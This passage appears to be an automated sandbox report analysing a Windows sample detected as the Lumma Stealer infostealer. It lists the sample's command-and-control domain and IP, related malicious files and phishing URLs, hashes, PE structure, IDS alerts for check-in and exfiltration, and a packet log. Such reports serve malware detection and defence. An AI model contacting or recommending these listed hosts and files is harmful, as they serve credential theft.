https://necklacedmny.store/apisco	file.exe, 00000000.00000003.3297236452.0000000000E50000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3295643182.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3302799691.0000000000E51000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://necklacedmny.store/api1R	file.exe, 00000000.00000003.2906265983.000000000558E000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	file.exe, 00000000.00000003.2787543229.0000000005891000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://necklacedmny.store/apid	file.exe, 00000000.00000003.2829174271.0000000000E51000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://necklacedmny.store/api;m	file.exe, 00000000.00000003.2779545659.000000000557A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2906265983.000000000558E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2783683921.000000000557F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2785869789.000000000558B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2787512448.000000000558E000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://necklacedmny.store/	file.exe, file.exe, 00000000.00000003.3278936830.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3049052120.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3288959776.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2829174271.0000000000E51000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3289238739.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3302911501.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3296964190.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3049021102.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.c.lencr.org/0	file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://necklacedmny.store/apiY	file.exe, 00000000.00000003.3271527180.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3271793739.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3049021102.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3	file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://necklacedmny.store/apihmm	file.exe, 00000000.00000003.3297236452.0000000000E50000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3295643182.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3289149331.0000000000E51000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3279193517.0000000000E51000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3302799691.0000000000E51000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org/products/firefoxgro.all	file.exe, 00000000.00000003.2787543229.0000000005891000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.mozilla.or	file.exe, 00000000.00000003.2787465347.00000000055B2000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://necklacedmny.store:443/api	file.exe, 00000000.00000003.3295643182.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	necklacedmny.store	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1544045
Start date and time:	2024-10-28 18:42:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@5/1
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target file.exe, PID 5936 because there are no executed function
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
13:43:05	API Interceptor	2970510x Sleep call for process: file.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/jI82Ms6K/download
	9D7RwuJrth.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	304773cm.n9shteam.in/jscpuGamegeneratorprivate.php
	DBUfLVzZhf.exe	Get hash	malicious	JohnWalkerTexasLoader	Browse	xilloolli.com/api.php?status=1&wallets=0&av=1
	R5AREmpD4S.exe	Get hash	malicious	JohnWalkerTexasLoader	Browse	xilloolli.com/api.php?status=1&wallets=0&av=1
	7950COPY.exe	Get hash	malicious	FormBook	Browse	www.globaltrend.xyz/b2h2/
	transferencia interbancaria_667553466579.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/Gitmx
	19387759999PO-RFQ-INVOICE-doc.exe	Get hash	malicious	FormBook	Browse	www.zonguldakescortg.xyz/483l/
	PO 4800040256.exe	Get hash	malicious	FormBook	Browse	www.rtpngk.xyz/876i/
	yGktPvplJn.exe	Get hash	malicious	Pushdo	Browse	www.fnsds.org/
	rPedidodecompra__PO20441__ARIMComponentes.exe	Get hash	malicious	Lokibot, PureLog Stealer, zgRAT	Browse	dddotx.shop/Mine/PWS/fre.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
necklacedmny.store	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	https://duy38.r.ag.d.sendibm3.com/mk/cl/f/sh/1t6Af4OiGsF30wT9TF4ckLf3fAzx5z/28D7HenRXzOU	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://link.edgepilot.com/s/b064b0de/7_W48d8I8kGlXhrfD-hDUg?u=https://delivmodas.ks.infinitoag.com/	Get hash	malicious	Unknown	Browse	104.18.11.207
	6B530627-1802-4180-83E0-9D13C1074460.1_originalmail.eml	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://docs.google.com/drawings/d/1O7L6jnunpKYYRy1ZXX5DN4ENeZ4pxxWF8BG0mcDdFi0/preview?pli=1ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVe	Get hash	malicious	HTMLPhisher	Browse	104.21.49.204
	renier_visser-In Employee -11384.pdf	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://www-suasconsult-com-br.translate.goog/?_x_tr_sl=pt&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=sc	Get hash	malicious	Unknown	Browse	188.114.96.3
	z74fBF2ObiS1g87mbS.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	http://shoutout.wix.com	Get hash	malicious	Unknown	Browse	188.114.96.3
	Scan_1626227.pdf	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	https://onedrive.live.com/view.aspx?resid=8656653D19C3C7C0!sb98dbf79ab614921877689e4912e2fae&migratedtospo=true&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy84NjU2NjUzZDE5YzNjN2MwL0VubV9qYmxocXlGSmgzYUo1SkV1TDY0QmtKQzA5SEFwTjV6cTh1YW5PSWxxNEE_ZT1pdGFpeGo&wd=target%28Sezione%20senza%20titolo.one%7Ccfe57f3b-5d7b-4d15-b045-f6fdb53b3776%2FRechnung%2039920898-43006843%20%5C%7C%20Ebner%20Media%20Group%7C205becae-dae9-4a36-907a-485bcab69387%2F%29&wdorigin=NavigationUrl	Get hash	malicious	Unknown	Browse	104.21.79.135

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	XS_Trade_AI-newest_release_.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	https://dl.dropboxusercontent.com/scl/fi/95is2w1ywjvorzayt88dp/DKM-0192PDF.zip?rlkey=svoej4s4tb5lwbnvthtgrmokl&st=d99zdn1k&dl=0	Get hash	malicious	Abobus Obfuscator	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Okfjk1hs4kdhs2.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.566920978410129
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	2'972'160 bytes
MD5:	e9d35001e68e949a301d6d0073be4661
SHA1:	a378145e6a306b2e7c4f87508906263ab9863a76
SHA256:	d500d4168637de6e15d03181eff6abdb01c45cea42bfe20562ac9496bafb3308
SHA512:	16111fe7ddb9a2fd5ea23741ee1077405beefdf330b5af015cad91ae9adac6df19217960b0c6c609e6661677b44d5d65140bf2c3b40ce01b85b25816780abac6
SSDEEP:	49152:aZwD/W7/xk4ubIuO3NHX4DmYsF4KG4ErqGjmfcT4:6wDe7pk4qIuOdu9sF4KpE/jmkT
TLSH:	B0D55C92B54672DFD88E17749527CF81692C02FE0B2825C3A86C76BE7D63DC11BB6C24
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........p0...........@...........................0.......-...@.................................T...h..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x707000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F02B87D347Ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5a054	0x68	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5a1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x58000	0x27e00	f4cea0e367fd0c299b6115b6cc0ade8f	False	0.9978325822884012	data	7.968774204528531	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x59000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x5a000	0x1000	0x200	555a11fa24a077379003c187d9c9d020	False	0.14453125	data	0.9996515881509258	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
tenlogwb	0x5b000	0x2ab000	0x2aa400	d3b563b6b8014f25a5b444f50be2e274	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
zqaausgd	0x306000	0x1000	0x400	c990af7d5db0e8d7a0ca97e85ebc6538	False	0.7724609375	data	6.027948079308269	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x307000	0x3000	0x2200	d558bb2935044e88af1d4985be83df1a	False	0.07961856617647059	DOS executable (COM)	1.1925215260271207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-28T18:43:08.002228+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49709	188.114.96.3	443	TCP
2024-10-28T18:43:08.002228+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49709	188.114.96.3	443	TCP
2024-10-28T18:43:09.203893+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	49711	188.114.96.3	443	TCP
2024-10-28T18:43:09.203893+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49711	188.114.96.3	443	TCP
2024-10-28T18:44:58.474401+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	49989	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 28, 2024 18:43:06.429733992 CET	49709	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:06.429779053 CET	443	49709	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:06.430255890 CET	49709	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:06.432794094 CET	49709	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:06.432809114 CET	443	49709	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:07.094464064 CET	443	49709	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:07.094605923 CET	49709	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:07.194138050 CET	49709	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:07.194163084 CET	443	49709	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:07.194469929 CET	443	49709	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:07.248435020 CET	49709	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:07.445482016 CET	49709	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:07.445717096 CET	49709	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:07.445741892 CET	443	49709	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:08.002239943 CET	443	49709	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:08.002338886 CET	443	49709	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:08.002412081 CET	49709	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:08.004106045 CET	49709	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:08.004128933 CET	443	49709	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:08.004143953 CET	49709	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:08.004149914 CET	443	49709	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:08.057934999 CET	49711	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:08.057962894 CET	443	49711	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:08.058023930 CET	49711	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:08.058348894 CET	49711	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:08.058367968 CET	443	49711	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:08.672694921 CET	443	49711	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:08.672842026 CET	49711	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:08.674031973 CET	49711	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:08.674041986 CET	443	49711	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:08.674272060 CET	443	49711	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:08.675584078 CET	49711	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:08.675617933 CET	49711	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:08.675658941 CET	443	49711	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:09.203948021 CET	443	49711	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:09.204082966 CET	443	49711	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:09.204145908 CET	49711	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:09.204164982 CET	443	49711	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:09.204262018 CET	443	49711	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:09.204308033 CET	49711	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:09.204315901 CET	443	49711	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:09.204715967 CET	443	49711	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:09.204770088 CET	49711	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:09.204777956 CET	443	49711	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:09.204875946 CET	443	49711	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:09.204925060 CET	49711	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:09.204932928 CET	443	49711	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:09.205437899 CET	443	49711	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:09.205491066 CET	49711	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:09.205497980 CET	443	49711	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:09.251600027 CET	49711	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:09.320847034 CET	443	49711	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:09.321011066 CET	443	49711	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:09.321099997 CET	49711	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:09.321120024 CET	443	49711	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:09.321259975 CET	443	49711	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:09.321336031 CET	49711	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:09.321366072 CET	443	49711	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:09.321576118 CET	443	49711	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:09.321640968 CET	49711	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:09.321698904 CET	49711	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:09.321716070 CET	443	49711	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:09.321728945 CET	49711	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:09.321734905 CET	443	49711	188.114.96.3	192.168.2.6
